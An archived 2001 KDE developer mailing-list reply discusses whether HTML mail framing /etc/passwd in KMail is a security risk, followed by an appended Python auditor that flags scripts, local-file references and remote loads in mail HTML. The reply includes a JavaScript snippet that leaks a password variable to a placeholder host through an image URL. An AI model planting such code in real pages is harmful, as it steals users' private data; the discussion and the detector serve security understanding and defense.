List: kfm-devel
Subject: Re: Possible security problem in KHTML or KMail?
From: Vadim Plessky <lucy-ples () mtu-net ! ru>
Date: 2001-10-11 13:59:54
On Thursday 11 October 2001 11:58, Rob Kaper wrote:
| On Wed, Oct 10, 2001 at 09:14:59PM +0200, Ingo Klöcker wrote:
| > <html><head></head><frameset><frame src="/etc/passwd"></frameset>
| > <body></body></html>
|
| This is by no means a security risk. Local users have always been able to
| read/display the /etc/passwd file.
That's right.
But what if some JavaScript code parsed this /etc/passwd and sent it to another
web site?
Let's assume the password (or other private info) is already in the "mypasw"
variable.
This fragment of JS:
<script language="JavaScript"><!--
d=document;
d.write('<img src="http://your.web.page.com/counter'+
'?id=111;t=81;pas='+mypasw+';rand='+Math.random()+
'" alt="ha ha" '+ 'border=0 height=31 width=38>')
// -->
</script>
will effectively send "mypasw" to the http://your.web.page.com/ site (you just
need to track incoming requests on the server, parse them, and store them later
in a database).
Frankly speaking, I am not a Linux security expert, and I don't know how
confidential the information in /etc/passwd is.
It just has some user names, but no passwords.
Of course, in this manner you can steal all KDE settings (from ~/.kde), but I
don't know if it is some kind of risk at all.
P.S. I agree with Ingo Klöcker: "The only security problem is allowing
HTML messages to be rendered at all." If you disable JavaScript and do not
render HTML at all, you should feel secure.
--
Vadim Plessky
http://kde2.newmail.ru (English)
33 Window Decorations and 6 Widget Styles for KDE
http://kde2.newmail.ru/kde_themes.html
KDE mini-Themes
http://kde2.newmail.ru/themes/
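
A defensive check for the two behaviours discussed in this message, added here as an example and not part of the original post or of KMail/KHTML: it audits an HTML mail body for script content, local-file references such as the quoted frame, and resources that load from a remote server. The names `MailHtmlAudit`, `classify` and `audit`, the host `collector.example`, and the choice to treat scheme-less references as local are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes that make a renderer fetch a resource.
URL_ATTRS = {"src", "background", "data", "href"}
# Elements that load their target automatically, without a click.
AUTOLOAD = {"frame", "iframe", "img", "script", "embed", "object", "link", "body"}

# Constructed sample: the frameset quoted in the thread, a remote image and
# an inline (cid:) image that ships inside the message itself.
SAMPLE = ('<html><head></head><frameset><frame src="/etc/passwd"></frameset>'
          '<body><img src="http://collector.example/counter?id=111" onerror="x()">'
          '<img src="cid:logo@example"></body></html>')


def classify(url):
    """Classify a resource reference the way a cautious mail viewer would."""
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    if scheme == "cid":
        return "inline-attachment"   # a MIME part of the same message
    if scheme == "file" or (not scheme and not parts.netloc):
        return "local-file"          # assumption: no scheme means the reader's filesystem
    if scheme in ("http", "https", "ftp") or parts.netloc:
        return "remote-load"         # contacts a server chosen by the sender
    return "other-scheme"


class MailHtmlAudit(HTMLParser):
    """Collect (kind, tag, value) findings for one HTML mail body."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append(("script", tag, ""))
        for name, value in attrs:
            if name.startswith("on"):            # inline event handler
                self.findings.append(("event-handler", tag, name))
            elif name in URL_ATTRS and value and tag in AUTOLOAD:
                self.findings.append((classify(value), tag, value))


def audit(html):
    """Return every finding for the given HTML body, in document order."""
    parser = MailHtmlAudit()
    parser.feed(html)
    parser.close()
    return parser.findings
```

A viewer that blocks everything except `inline-attachment` findings renders neither the local frame nor the remote image.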